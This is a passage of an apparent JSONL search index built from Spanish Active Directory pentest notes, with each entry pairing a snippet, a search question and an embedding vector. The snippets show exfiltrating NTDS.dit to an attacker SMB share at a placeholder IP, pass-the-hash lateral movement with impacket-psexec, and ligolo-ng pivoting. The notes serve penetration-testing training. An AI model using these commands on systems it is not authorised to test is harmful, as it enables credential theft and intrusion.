0.01721, 0.08662, -0.05119, -0.01875, -0.00113, -0.00123, 0.08051, 0.10327, -0.00601, -0.06356, 0.06068, 0.06831, 0.0566, 0.02688, 0.03176, -0.07392, 0.00332, 0.04801, 0.06291, -0.03524, 0.00694, 0.05518, 0.07363, 0.02448, -0.08986, -0.01302, -0.08131, -0.02613, 0.01078, 0.0331, -0.04585, -0.03058, -0.08711, 0.0905, 0.03787, 0.02706, -0.02702, -0.04674, -0.03662, -0.01382, 0.04298, -0.04729, -0.00882, -0.01963, -0.00708, -0.00519, -0.01081, 0.02472, -0.0411, -0.01044, -0.02319, -0.03997, -0.03877, -0.01179, 0.02403, -0.05784, 0.0698, -0.0165, 0.03553, -0.01821, 0.01371, 0.01333, -0.0553, 0.00469, -0.02936, 0.03957, -0.06827, 0.09943, -0.0382, 0.01237, 0.00946, 0.03086, -0.03385, 0.01913, -0.02867, -0.00514, 0.00598, 0.05648, 0.03199, 0.02101, 0.00517, -0.02506, 0.0224, 0.03683, -0.00394, -0.05174, 0.03349, 0.00645, 0.04741, -0.04982, -0.10609, -0.07472, 0.01253, 0.03567, -0.02748, -0.0564, 0.04747, 0.0106, 0.00155, -0.00655, 0.01936, -0.00785, 0.00873, -0.00946, 0.01481, 0.01365, -0.03885, 0.00298, -0.02905, -0.04802, -0.06957, -0.08548, -0.01881, 0.00993, 0.03042, -0.03547, -0.01752, 0.01168, 0.02373, -0.00123, -0.08447, 0.0099]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### D) Exfiltras un fichero grande (NTDS.dit, etc.)\n\nDesde la vΓ­ctima:\n\n```cmd\ncopy C:\\Windows\\NTDS\\ntds.dit \\\\TU_IP\\loot\\\n```\n\nAparece en `/tmp/loot/` en tu Kali. **Esto sustituye al wget**, porque SMB cifra y atraviesa muchos firewalls.", "indexar": "que programa sirve para copiar archivos grandes de forma cifrada a travΓ©s de la red?", "v": [0.08247, -0.03948, -0.09099, -0.12447, 0.10402, -0.22134, 0.06637, -0.03796, -0.03732, -0.16329, 0.03351, -0.17247, 0.03565, -0.13798, 0.10853, -0.06684, 0.05255, -0.10219, 0.10373, 0.00253, 0.09145, -0.00023, -0.00853, -0.10502, -0.03784, -0.00514, 0.11619, 0.0175, -0.07194, 0.07738, 0.04412, 0.01965, 0.14059, -0.08581, -0.05439, 0.0714, 0.0323, 0.01581, -0.10598, 0.01515, -0.00161, 0.14467, -0.03006, -0.0025, 0.01425, -0.0382, 0.00635, 0.04952, -0.02363, 0.02689, -0.02828, -0.05224, -0.07457, -0.055, -0.0793, -0.10721, -0.00773, -0.08727, -0.13395, 0.06515, 0.02585, 0.04914, -0.05209, 0.03036, 0.0227, -0.0488, -0.02007, -0.02467, -0.11192, 0.01486, -0.0229, 0.17376, -0.03637, -0.00054, -0.03203, -0.02699, -0.09894, -0.14028, -0.02375, -0.0644, 0.02029, -0.09089, -0.02944, -0.01774, -0.02914, -0.04263, 0.04178, 0.05777, -0.03767, -0.04387, 0.02877, 0.04728, 0.08644, 0.04107, 0.01558, -0.08252, 0.0931, -0.00355, 0.01751, 0.02758, 0.01479, -0.01544, -0.05991, 0.05337, -0.02505, 0.14809, 0.04435, -0.04308, 0.00084, 0.02439, 0.05973, -0.0065, 0.00593, -0.03184, -0.11111, -0.03305, 0.06293, -0.03207, 0.02958, -0.03913, -0.03367, 0.09577, -0.07138, -0.00528, 0.02938, -0.02742, -0.05489, 0.08792, -0.05624, 0.01586, -0.00395, 0.09165, 0.00263, 0.03238, -0.09139, -0.09037, -0.04415, -0.03868, 0.00754, -0.08275, 0.06375, 0.11965, -0.09253, -0.06906, 0.02775, 0.0126, 0.13328, -0.06327, -0.05842, -0.01895, -0.03222, 0.02894, -0.04128, 0.00401, -0.0577, 0.05589, -0.00402, -0.11188, -0.04768, 0.09313, -0.04723, 0.00369, -0.06998, -0.03164, 0.01155, -0.0699, 0.05336, 0.00368, 0.13636, 0.01204, -0.01081, 0.04223, -0.07182, -0.10366, -0.03281, -0.00377, -0.04877, -0.1119, 0.02673, -0.09237, -0.0419, 0.05932, 0.01893, 0.02918, 0.00643, -0.05972, 0.01791, 0.02257, -0.09376, 0.01918, -0.00283, 0.01617, -0.02884, -0.00296, -0.0246, -0.0154, -0.05446, 0.05841, 0.10792, -0.03352, -0.06124, -0.01522, -0.07016, 0.01663, 0.03806, 0.0572, -0.07701, 0.01664, 0.02079, 0.07139, -0.01722, -0.03471, 0.06059, -0.02724, -0.02245, -0.04621, 0.00095, 0.02804, 0.11226, 0.02949, 0.03329, -0.02424, 0.03639, 0.04451, -0.02151, -0.0383, 0.04467, -0.02095, 0.00643, 0.01211, 0.00794, -0.01742, 0.03233, 0.0, 0.02878, -0.04721, -0.00671, 0.0196, -0.07077, -0.0931, -0.0107, 0.09683, -0.02978, 0.00138, 0.0279, 0.00706, -0.0617, 0.01858, 0.09232, -0.03796, -0.05262, 0.09203, 0.04711, 0.01111, 0.07133, 0.00916]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### D) Exfiltras un fichero grande (NTDS.dit, etc.)\n\nDesde la vΓ­ctima:\n\n```cmd\ncopy C:\\Windows\\NTDS\\ntds.dit \\\\TU_IP\\loot\\\n```\n\nAparece en `/tmp/loot/` en tu Kali. **Esto sustituye al wget**, porque SMB cifra y atraviesa muchos firewalls.", "indexar": "con que puedo transferir un fichero grande sin pasar por el servidor local?", "v": [0.09254, 0.03099, -0.18053, -0.09089, 0.00274, -0.11261, 0.0916, -0.0712, -0.02972, -0.07131, -0.05171, 0.01888, 0.03434, -0.07803, 0.03954, 0.03147, 0.11194, -0.08067, 0.11169, -0.02898, 0.04259, 0.09567, 0.05684, -0.08503, -0.03907, 0.02668, 0.04415, -0.0908, -0.15924, -0.09132, 0.14308, -0.01477, 0.12427, 0.00398, 0.14366, -0.09048, 0.07274, 0.10289, -0.10872, -0.03098, 0.16012, 0.01432, -0.04905, 0.06707, -0.01774, -0.08154, -0.00631, -0.0805, 0.1768, -0.00612, 0.01489, -0.15739, -0.14621, -0.01565, -0.04254, 0.01665, 0.10541, -0.10975, 0.1265, 0.0122, -0.1509, 0.02326, -0.02056, 0.00943, 0.11093, -0.00838, -0.04243, 0.0238, -0.09392, -0.04541, -0.06643, 0.10416, -0.01062, 0.00177, -0.04182, 0.03572, -0.01124, -0.02739, 0.01862, 0.01128, 0.03254, 0.01551, -0.00221, 0.04334, -0.02335, -0.03798, 0.042, -0.0549, 0.0996, 0.0121, 0.0833, -0.05036, 0.03239, 0.02243, 0.06294, -0.03471, 0.02246, -0.01865, -0.04437, -0.033, 0.0508, 0.08046, -0.04488, 0.07602, 0.02386, 0.08709, 0.1385, -0.05583, 0.1201, -0.05441, 0.13625, 0.00695, 0.02405, 0.05148, -0.01195, -0.04598, -0.01312, 0.0379, -0.00724, 0.06361, -0.1009, -0.06814, 0.02662, 0.03754, -0.03229, -0.06076, 0.01647, 0.04093, -0.05091, 0.02751, -0.03134, 0.02388, -0.07635, -0.06495, -0.03791, -0.0195, 0.09486, -0.02901, -0.01465, -0.03427, -0.02226, 0.01772, -0.00396, 0.02878, 0.06321, 0.04417, 0.02875, -0.03452, -0.1002, -0.02965, 0.03403, -0.01507, -0.03642, 0.05878, -0.0882, 0.00652, 0.05593, -0.06398, -0.05624, 0.04756, 0.01842, 0.10595, 0.05806, 0.02725, -0.0565, -0.0105, -0.01288, 0.03937, 0.06783, 0.03087, -0.08358, 0.00437, -0.04346, -0.05271, 0.05015, -0.03548, -0.02604, -0.0788, 0.0538, 0.00747, 0.0095, 0.03643, -0.00927, 0.07565, -0.07393, -0.01646, -0.04549, -0.01091, -0.0348, 0.04798, -0.02046, 0.03064, -0.01491, 0.05553, 0.00684, -0.07986, -0.05184, -0.00947, -0.01766, -0.00064, -0.05629, -0.00633, -0.02885, -0.05366, 0.01278, 0.05566, -0.08119, 0.05804, -0.07299, 0.02849, -0.05123, -0.03006, 0.11295, -0.04702, -0.02124, 0.0329, 0.04116, -0.08441, -0.00093, 0.01604, 0.02351, 0.04096, 0.05052, -0.02334, -0.00639, 0.06931, 0.06377, -0.03823, 0.06233, 0.06128, -0.08035, 0.08733, -0.01014, -0.02658, 0.05941, -0.00607, -0.01053, -0.03356, -0.06306, -0.06195, -0.01719, 0.07386, -0.04182, -0.067, 0.00735, -0.04456, -0.12808, -0.0316, 0.01515, -0.09288, -0.02905, -0.04042, 0.0922, -0.00832, 0.03086, -0.00832]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### D) Exfiltras un fichero grande (NTDS.dit, etc.)\n\nDesde la vΓ­ctima:\n\n```cmd\ncopy C:\\Windows\\NTDS\\ntds.dit \\\\TU_IP\\loot\\\n```\n\nAparece en `/tmp/loot/` en tu Kali. **Esto sustituye al wget**, porque SMB cifra y atraviesa muchos firewalls.", "indexar": "que alternativa al wget hay si necesito usar SMB?", "v": [-0.01842, 0.03023, -0.24695, -0.02832, -0.02582, -0.05373, -0.29419, -0.17913, -0.12803, -0.00609, -0.22327, -0.04845, 0.03655, -0.01025, -0.04096, 0.02736, -0.07509, -0.09873, 0.0375, 0.01399, 0.06095, -0.05055, -0.03573, -0.06094, -0.0581, 0.06109, -0.00587, 0.0324, -0.07906, 0.07797, -0.08419, 0.02726, 0.0236, -0.04042, -0.11712, 0.03096, 0.05668, -0.0447, 0.08359, -0.05954, 0.08089, 0.02384, -0.06359, 0.07274, -0.03709, -0.02306, -0.07444, -0.02149, -0.18486, 0.0796, 0.01989, 0.00117, -0.11559, 0.06893, -0.01913, -0.00411, 0.13021, -0.11729, -0.12186, -0.06287, -0.1269, -0.00851, 0.10392, 0.07642, 0.06397, -0.02086, -0.09469, 0.04899, -0.10888, -0.02974, -0.08548, 0.05934, 0.04637, -0.01482, -0.05422, 0.06104, 0.05549, -0.02281, -0.01715, 0.03827, 0.00339, -0.03666, 0.09656, 0.01053, -0.08722, -0.06889, 0.10355, 0.01818, 0.0427, -0.02942, -0.03166, 0.06036, 0.00762, 0.02525, -0.0346, -0.07762, -0.08729, 0.06866, 0.11498, 0.06089, 0.09905, -0.01653, 0.00206, 0.03061, 0.00472, -0.03259, -0.00669, -0.02991, -0.02456, 0.03486, -0.00741, 0.02874, 0.03048, -0.02259, 0.01157, -0.03983, 0.00363, -0.05867, -0.04417, -0.03653, -0.04877, 0.01324, 0.02689, -0.16586, -0.01153, -0.01395, 0.10306, -0.01608, -0.04655, 0.04294, 0.02301, -0.08268, -0.00348, -0.07534, -0.08946, -0.00192, 0.03594, -0.02843, 0.00901, 0.02293, -0.02581, -0.01488, -0.07844, -0.06088, -0.04651, 0.00062, -0.01574, -0.03329, 0.00706, -0.05707, 0.07565, -0.05144, -0.01605, 0.07731, -0.00821, -0.00893, 0.02506, -0.03486, -0.07511, 0.04499, -0.01851, -0.09145, -0.01767, 0.06435, -0.02045, -0.10551, 0.04398, -0.03036, -0.06896, 0.00012, 0.05141, 0.09259, 0.04321, -0.04703, 0.09989, -0.06685, 0.04542, 0.01531, -0.01416, -0.01192, 0.04718, -0.01887, -0.05333, 0.08243, 0.04513, -0.0159, 0.00896, 0.05002, -0.03332, 0.03231, -0.04837, 0.04173, 0.03005, 0.00675, -0.01387, 0.03729, 0.09217, -0.0417, 0.0313, -0.04233, -0.01284, 0.04269, -0.12497, -0.07691, 0.04742, -0.02671, -0.04989, 0.05843, 0.05937, 0.01103, 0.05523, -0.026, 0.01024, 0.03367, 0.03193, -0.00971, -0.0043, 0.07773, 0.06608, -0.01705, 0.02069, 0.03909, -0.06122, 0.07638, 0.02587, 0.01264, -0.04228, -0.00171, -0.03759, 0.02508, 0.03004, 0.03603, 0.02629, 0.07789, -0.0213, -0.03072, -0.05015, -0.03374, 0.00989, -0.01156, -0.04243, 0.01539, -0.00627, 0.04159, -0.04724, 0.02285, -0.06316, -0.02271, -0.05868, -0.04082, 0.07536, 0.01612, 0.00929, 0.01448, 0.01531, 0.08761]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### E) Lateral movement con Impacket (sin reverse shell nueva)\n\nUna vez tienes hash de un user privilegiado:\n\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'\n```\n\nTe da shell SYSTEM en otra mΓ‘quina, **sin necesidad de meter ninguna reverse shell**. Por encima de la red, autenticado, limpio.", "indexar": "que herramienta sirve para mover lateralmente entre mΓ‘quinas sin usar reverse shells?", "v": [0.07797, -0.03545, -0.16699, -0.19607, -0.18572, -0.0665, -0.20669, 0.03663, 0.02115, -0.09272, -0.17006, -0.05333, 0.10781, -0.02392, 0.09307, 0.04097, 0.00588, -0.12048, -0.08109, 0.00924, -0.01493, -0.03795, -0.04761, -0.09944, -0.04268, 0.16727, 0.05544, -0.06929, -0.28118, 0.00072, -0.08951, 0.02525, 0.12372, -0.06027, -0.07133, -0.08478, -0.02873, -0.0125, 0.05836, 0.06483, 0.00729, 0.02194, -0.15676, 0.08109, 0.05659, 0.00867, -0.03317, -0.00967, -0.02663, 0.11929, -0.01942, -0.09561, -0.06836, 0.02321, -0.01213, -0.1614, 0.17067, -0.051, 0.03205, -0.1098, -0.09456, 0.07445, -0.13666, 0.05309, 0.00614, -0.08017, -0.03548, -0.10298, -0.09522, -0.02743, -0.02205, 0.04053, 0.08419, 0.04324, -0.06516, 0.0173, 0.09429, 0.04579, 0.02904, 0.03711, -0.02887, 0.01952, -0.10181, -0.01186, 0.04877, -0.03008, 0.06105, -0.02667, 0.06877, -0.00197, -0.0034, 0.10552, -0.01408, 0.00484, 0.07564, 0.00697, -0.05745, 0.02171, -0.02808, -0.01864, 0.16466, -0.07062, 0.03657, 0.02881, -0.05504, -0.0059, 0.01092, -0.0371, -0.00238, 0.02815, 0.08203, 0.01229, 0.01416, 0.01759, -0.03945, 0.04092, -0.06414, 0.0004, -0.01133, -0.05332, 0.07784, -0.0234, -0.00379, -0.06835, -0.00043, -0.04012, 0.01202, 0.07746, -0.05811, -0.01526, 0.04609, -0.04495, -0.06175, 0.00868, -0.02146, -0.01142, 0.11843, -0.0511, 0.00715, -0.03972, 0.04084, 0.10595, -0.11498, -0.0714, 0.01245, 0.01703, 0.10142, -0.03428, -0.00622, -0.04573, 0.06076, -0.04647, 0.03426, 0.02557, -0.04622, -0.00445, -0.02128, 0.02919, -0.14017, -0.03351, -0.08264, -0.01776, -0.00333, 0.03169, -0.0054, -0.06346, -0.00457, 0.03417, 0.04719, 0.00673, 0.02918, 0.03017, 0.06902, 0.05647, 0.03664, 0.03654, -0.03901, 0.04773, 0.00323, -0.03135, 0.04975, -0.01788, -0.0019, -0.06342, -3e-05, 0.00486, 0.01661, 0.00031, -0.00553, 0.06757, -0.0173, 0.02941, -0.00498, -0.0403, 0.03924, 0.04451, 0.02081, -0.02505, 0.06717, -0.0105, -0.03344, 0.01146, -0.00086, 0.00506, 0.01518, 0.06839, -0.03686, -0.04793, 0.00658, -0.02665, 0.02882, 0.03259, 0.00174, 0.07578, -0.01549, -0.01722, -0.04503, 0.02473, -0.0428, 0.00391, 0.00175, -0.06349, -0.04376, -0.00994, -0.00878, 0.0052, 0.02382, 0.00287, 0.00493, -0.03241, 0.04103, 0.04271, 0.03932, 0.0403, -0.05537, -0.03948, 0.04945, -0.02055, 0.01918, -0.01173, -0.04746, 0.01528, 0.01554, -0.06536, -0.02197, -0.00114, 0.00648, -0.05908, -0.03308, 0.01427, -0.0151, -0.00216, 0.00651, -0.0332, 0.00723, 0.06055]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### E) Lateral movement con Impacket (sin reverse shell nueva)\n\nUna vez tienes hash de un user privilegiado:\n\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'\n```\n\nTe da shell SYSTEM en otra mΓ‘quina, **sin necesidad de meter ninguna reverse shell**. Por encima de la red, autenticado, limpio.", "indexar": "con que programa puedo ejecutar comandos en otro servidor usando hashes NTLM?", "v": [0.03578, 0.01178, -0.09571, -0.15207, -0.00026, -0.08583, -0.00774, -0.00976, -0.0732, 0.05396, -0.14827, 0.0523, 0.09004, -0.05333, -0.04101, 0.1225, 0.17712, -0.09196, 0.01541, 0.02803, 0.00885, -0.00663, -0.0392, -0.04575, -0.01893, 0.01798, 0.01625, -0.00234, -0.0998, -0.06782, -0.06803, -0.04192, 0.0179, -0.03257, 0.03759, 0.02, -0.05691, 0.04101, -0.03184, 0.18399, 0.04905, 0.13273, -0.13732, 0.04346, 0.07274, -0.06525, 0.05294, -0.09084, 0.11285, -0.19033, 0.0364, -0.01323, -0.174, -0.06998, -0.01444, -0.05775, 0.1195, -0.10052, -0.05639, 0.01069, -0.06868, -0.06219, 0.06285, -0.05115, 0.02285, -0.04009, 0.01793, -0.08149, -0.03816, 0.02658, -0.16279, 0.10872, -0.00106, -0.04739, 0.06768, 0.02164, -0.02859, -0.0453, 0.12237, 0.05683, -0.03318, -0.02279, -0.02684, 0.10515, -0.12516, -0.09256, -0.05811, -0.06022, 0.03488, 0.01605, 0.05081, 0.0452, -0.02741, 0.06305, 0.11424, 0.00324, 0.14089, -0.01204, 0.07453, 0.03765, 0.10012, -0.00679, -0.07867, 0.14429, -0.02506, 0.09021, 0.11235, -0.05742, 0.04566, 0.0689, 0.08766, -0.07648, -0.03604, -0.06171, -0.07035, -0.05857, 0.00236, -0.04164, 0.0364, -0.00842, -0.12103, 0.04964, 0.01362, 0.12107, 0.06806, -0.07636, -0.0062, 0.08829, -0.04374, -0.01276, 0.00171, -0.01737, 0.03315, -0.03131, -0.02899, 0.05303, 0.05776, -0.0319, -0.0601, -0.1411, 0.07224, 0.04925, 0.00972, 0.05699, 0.0978, 0.00041, 0.03943, -0.10905, -0.03345, 0.0027, 0.14201, -0.02221, -0.07753, 0.03237, -0.09889, -0.05919, 0.01562, -0.02724, -0.10973, 0.08102, 0.00623, 0.02881, -0.03272, 0.04976, 0.04881, -0.01357, 0.02011, 0.02029, 0.04111, 0.06595, -0.0193, 0.03021, 0.02446, -0.04274, 0.02388, -0.06313, -0.03142, -0.02705, 0.00858, -0.00754, -0.03082, 0.05911, -0.00139, -0.01563, -0.0307, -0.04389, -0.04689, 0.05543, -0.01684, -0.01561, -0.00156, 0.0773, -0.04006, -0.0186, 0.04534, -0.02912, 0.02503, -0.02279, -0.0453, -0.05925, -0.04839, 0.02552, 0.01383, -0.05916, 0.03734, 0.04749, -0.0516, 0.07026, 0.01903, 0.06362, -0.00361, -0.01403, 0.08584, 0.00562, -0.05146, -0.00793, 0.03049, 0.00367, 0.01672, -0.01682, -0.03896, 0.02756, 0.05692, 0.0115, 0.0327, -0.05662, -0.00239, 0.00049, 0.05423, 0.01138, -0.03433, -0.0081, -0.03311, -0.03383, 0.02399, -0.01651, -0.02893, 0.00375, -0.01746, -0.08446, -0.00181, 0.06816, -0.00891, -0.08159, -0.00038, -0.04115, -0.07009, -0.01538, -0.0388, 0.01614, -0.00699, -0.00711, 0.0157, -0.06974, -0.03601, 0.00208]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### E) Lateral movement con Impacket (sin reverse shell nueva)\n\nUna vez tienes hash de un user privilegiado:\n\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'\n```\n\nTe da shell SYSTEM en otra mΓ‘quina, **sin necesidad de meter ninguna reverse shell**. Por encima de la red, autenticado, limpio.", "indexar": "cual es una alternativa libre a psexec de Impacket?", "v": [-0.24527, -0.05588, -0.09994, 0.11992, -0.01213, -0.14575, -0.018, -0.10483, -0.22106, -0.03524, -0.02917, -0.0674, -0.09709, 0.02567, 0.05592, -0.00477, -0.00014, -0.03653, 0.17869, -0.07442, -0.03733, 0.00495, -0.15233, -0.077, -0.09223, 0.01228, -0.05342, 0.12526, -0.10602, -0.1066, -0.12364, -0.0379, -0.00673, -0.06538, 0.01596, -0.06697, 0.11284, 0.03407, 0.16181, 0.00448, 0.05936, -0.06372, -0.1521, 0.10657, -0.03185, 0.0025, -0.06156, 0.08814, 0.04863, 0.05147, -0.12161, -0.04469, -0.02707, 0.06086, 0.08547, 0.07663, 0.07835, -0.10627, -0.07139, 0.04861, -0.0421, 0.12332, -0.01975, -0.07578, 0.04414, 0.01689, -0.06056, -0.10233, 0.0238, 0.00377, 0.07806, -0.0395, 0.01564, -0.04199, -0.15863, 0.04762, -0.04657, -0.05171, -0.06883, 0.06045, 0.02651, -0.05806, -0.04824, -0.00603, 0.0071, -0.02467, 0.10542, -0.12171, 0.00618, 0.04262, 0.11465, 0.04638, 0.02664, 0.14015, -0.05102, -0.12101, -0.00676, 0.08488, 0.00175, 0.03244, 0.03484, 0.1143, -0.10832, -0.0231, 0.03182, -0.05991, 0.00019, 0.0129, -0.04383, -0.03086, 0.04843, 0.07392, -0.01426, 0.04021, 0.00377, -0.12071, -0.00596, 0.03053, -0.0285, 0.02843, -0.01124, 0.05113, -0.02997, -0.06624, 0.06844, -0.01575, 0.0653, 0.06304, -0.02111, 0.02948, 0.05541, -0.03669, -0.07726, -0.08453, -0.07954, -0.01752, 0.05136, 0.03649, -0.02146, -0.00487, 0.03922, -0.0288, -0.01035, -0.01738, 0.00368, 0.01584, 0.00214, -0.02623, 0.02105, -0.03402, -0.06224, -0.05094, 0.00269, 0.14751, -0.03094, 0.04493, -0.03813, -0.01865, 0.0012, 0.06801, 0.01631, -0.0249, 0.04501, -0.00269, -0.03077, 0.0062, 0.0144, -0.01215, -0.07913, 0.00592, 0.01032, 0.0746, 0.10698, -0.00288, 0.02251, -0.07524, -0.02207, -0.11604, 0.0535, -0.04959, 0.02912, 0.01558, -0.06474, -0.00911, 0.02199, -0.05955, -0.00934, 0.00712, 0.01169, 0.01482, -0.02321, 0.00281, -0.06202, -0.09191, 0.01036, -0.0295, 0.03789, -0.05861, 0.00433, -0.00169, -0.04034, -0.04953, 0.02469, -0.03958, -0.00265, -0.04477, -0.04301, 0.01978, 0.00691, 0.0821, 0.06604, 0.00727, 0.07861, 0.01101, -0.08169, -0.00045, 0.02115, -0.04622, -0.01226, 0.0212, 0.03609, -0.01139, 0.01833, 0.01114, 0.00585, 0.01673, 0.02422, 0.03517, -0.02254, 0.01545, 0.00638, 0.0182, -0.01545, 0.0127, 0.0136, 0.01486, 0.00569, -0.00183, 0.01339, -0.03791, 0.07853, 0.07228, -0.04234, -0.04858, -0.0287, 0.00023, -0.07982, 0.00692, -0.0119, -0.04134, -0.0201, 0.07868, -0.00741, 0.01457, 0.06627, 0.04748]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### F) Pivoting (entrar en una red interna) con ligolo-ng\n\n```\n TU KALI USUARIO1 RED INTERNA\n 10.10.10.5 10.10.10.50 192.168.5.0/24\n β”‚ β”‚ β”‚\n β”‚ ligolo proxy β”‚ β”‚\n β”‚ ───── tunel ─────► β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ ligolo agent ─── puede llegar ──► 192.168.5.10 (DC)\n β”‚ β”‚\n β”‚ aΓ±ades ruta: β”‚\n β”‚ ip route add β”‚\n β”‚ 192.168.5.0/24 dev ligolo\n β”‚\n β”‚ ahora desde Kali:\n β”‚ impacket-psexec admin@192.168.5.10 ◄── el trΓ‘fico va por el tΓΊnel\n β–Ό\n```\n\n---", "indexar": "que programa se usa para montar un tΓΊnel hacia una red interna", "v": [0.02741, -0.08918, -0.13224, -0.12145, -0.00677, 0.04498, -0.1245, 0.01772, 0.03203, -0.03948, -0.16537, -0.00754, 0.11623, 0.0506, -0.06726, 0.07853, -0.05731, -0.05325, 0.28306, -0.0209, -0.14657, -0.08103, -0.00831, -0.01369, 0.0371, 0.07745, -0.01205, -0.14667, -0.00161, -0.11133, 0.07822, 0.01947, 0.14929, -0.04419, -0.04674, -0.07271, 0.04109, 0.06114, 0.01168, 0.02621, -0.09269, 0.00642, -0.12399, 0.06354, 0.09617, -0.01539, 0.04244, -0.09854, -0.00881, -0.03587, 0.07066, -0.002, -0.09126, -0.04768, 0.08488, -0.07354, -0.00339, -0.06561, -0.06143, -0.04662, 0.07281, 0.0245, 0.02923, 0.15502, 0.04238, -0.02069, 0.04374, 0.01187, -0.06355, -0.03436, -0.04492, -0.05292, -0.04064, 0.06277, -0.07099, 0.07684, -0.0448, 0.01599, 0.07468, 0.00399, -0.01956, 0.06149, 0.02456, 0.12073, -0.05203, -0.03203, 0.00548, -0.02264, -0.0041, 0.01721, -0.06087, 0.02409, 0.05388, 0.12544, 0.14795, -0.08286, 0.03778, 0.12306, 0.01175, -0.00313, -0.01525, -0.03426, -0.04429, 0.16353, 0.05697, 0.11257, 0.04487, -0.081, 0.07386, 0.07242, 0.04719, 0.11851, -0.02327, -0.04659, -0.10495, -0.06404, 0.02282, 0.08369, -0.03621, -0.07822, -0.06235, 0.07009, -0.05592, 0.01468, 0.01426, -0.0676, -0.0148, 0.06313, 0.00535, 0.08475, -0.04278, 0.04556, 0.01043, -0.05591, -0.03245, 0.01797, -0.04003, -0.0221, 0.04521, -0.01035, 0.03246, -0.02791, -0.02793, -0.08432, 0.00972, 0.07084, -0.03467, -0.19148, 0.02681, 0.07206, -0.01417, 0.03485, 0.00096, -0.04813, 0.01422, -0.04755, 0.02121, 0.00175, -0.04798, 0.11007, 0.01054, 0.02767, -0.04614, -0.07935, 0.03024, -0.04627, -0.04487, -0.02199, 0.06441, -0.01844, -0.01868, 0.07836, -0.01923, -0.00457, 0.03066, -0.01674, -0.01723, -0.10806, 0.05805, -0.0282, 0.00275, -0.0688, 0.0403, 0.08988, -0.0485, -0.0964, 0.02445, -0.02843, 0.03226, -0.02326, -0.02346, -0.04753, 0.01918, -0.00336, 0.01914, -0.01089, 0.00421, -0.01619, 0.05883, -0.0903, -0.08941, -0.00551, 0.06284, -0.02933, -0.01226, 0.02244, 0.00038, -0.00552, 0.04425, 0.16502, 0.07516, -0.04281, -0.01392, -0.00891, 0.00067, 0.03132, 0.01364, 0.06076, -0.01711, 0.04382, 0.06015, -0.0092, 0.00981, 0.05001, -0.04868, -0.04036, -0.01721, 0.01047, -0.06574, 0.03455, -0.0107, -0.0334, -0.05441, -0.02415, 0.0327, -0.01776, -0.00252, 0.05606, 0.00979, -0.0804, 0.01701, 0.05238, 0.00675, 0.02098, -0.02109, 0.04818, -0.02837, 0.04132, 0.03618, 0.00517, -0.02498, 0.02854, -0.03191, -0.06071, 0.05892, -0.01128]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### F) Pivoting (entrar en una red interna) con ligolo-ng\n\n```\n TU KALI USUARIO1 RED INTERNA\n 10.10.10.5 10.10.10.50 192.168.5.0/24\n β”‚ β”‚ β”‚\n β”‚ ligolo proxy β”‚ β”‚\n β”‚ ───── tunel ─────► β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ ligolo agent ─── puede llegar ──► 192.168.5.10 (DC)\n β”‚ β”‚\n β”‚ aΓ±ades ruta: β”‚\n β”‚ ip route add β”‚\n β”‚ 192.168.5.0/24 dev ligolo\n β”‚\n β”‚ ahora desde Kali:\n β”‚ impacket-psexec admin@192.168.5.10 ◄── el trΓ‘fico va por el tΓΊnel\n β–Ό\n```\n\n---", "indexar": "con que puedo acceder a una mΓ‘quina remota sin tener acceso directo a la red", "v": [-0.00691, 0.04104, -0.17468, -0.09169, 0.04846, 0.06017, -0.09492, 0.05979, -0.07203, -0.00625, -0.15157, -0.12738, 0.06084, -0.07687, 0.1977, 0.01874, 0.0258, 0.11267, 0.00802, -0.03378, 0.10865, -0.04112, 0.00643, -0.01843, 0.11622, 0.02699, 0.16505, -0.00441, -0.10304, -0.05836, 0.04912, -0.00102, 0.04246, -0.01607, 0.01023, -0.05402, 0.05662, 0.15108, 0.02547, 0.01424, 0.00432, 0.03222, -0.1228, -0.03901, 0.1539, -0.04428, 0.07776, 0.02738, -0.05377, -0.01914, -0.05401, -0.0721, -0.08148, -0.13795, -0.0937, -0.08343, 0.1808, -0.02696, 0.06745, -0.02421, 0.03925, 0.05108, -0.04425, 0.02969, -0.0332, -0.05054, 0.03531, -0.01438, -0.08061, 0.0288, -0.11792, -0.05487, -0.016, -0.00182, 0.03663, 0.00173, -0.0986, 0.00944, 0.03729, -0.02793, -0.03165, -0.02496, -0.00864, -0.04883, -0.06769, -0.14302, 0.09925, -0.04221, -0.03694, -0.13688, 0.08112, -0.02096, 0.01745, 0.01917, 0.0689, -0.02219, -0.00571, -0.07583, -0.02865, -0.0749, 0.00551, 0.04016, -0.06161, 0.10136, 0.00697, 0.06847, 0.09708, -0.05806, 0.02638, -0.05344, 0.02307, -0.03033, -0.07803, -0.08592, -0.01574, 0.00453, -0.12424, -0.01473, -0.0437, -0.01458, -0.08895, -0.08015, 0.03729, -0.05198, 0.01299, -0.04456, 0.01028, 0.0411, -0.05769, 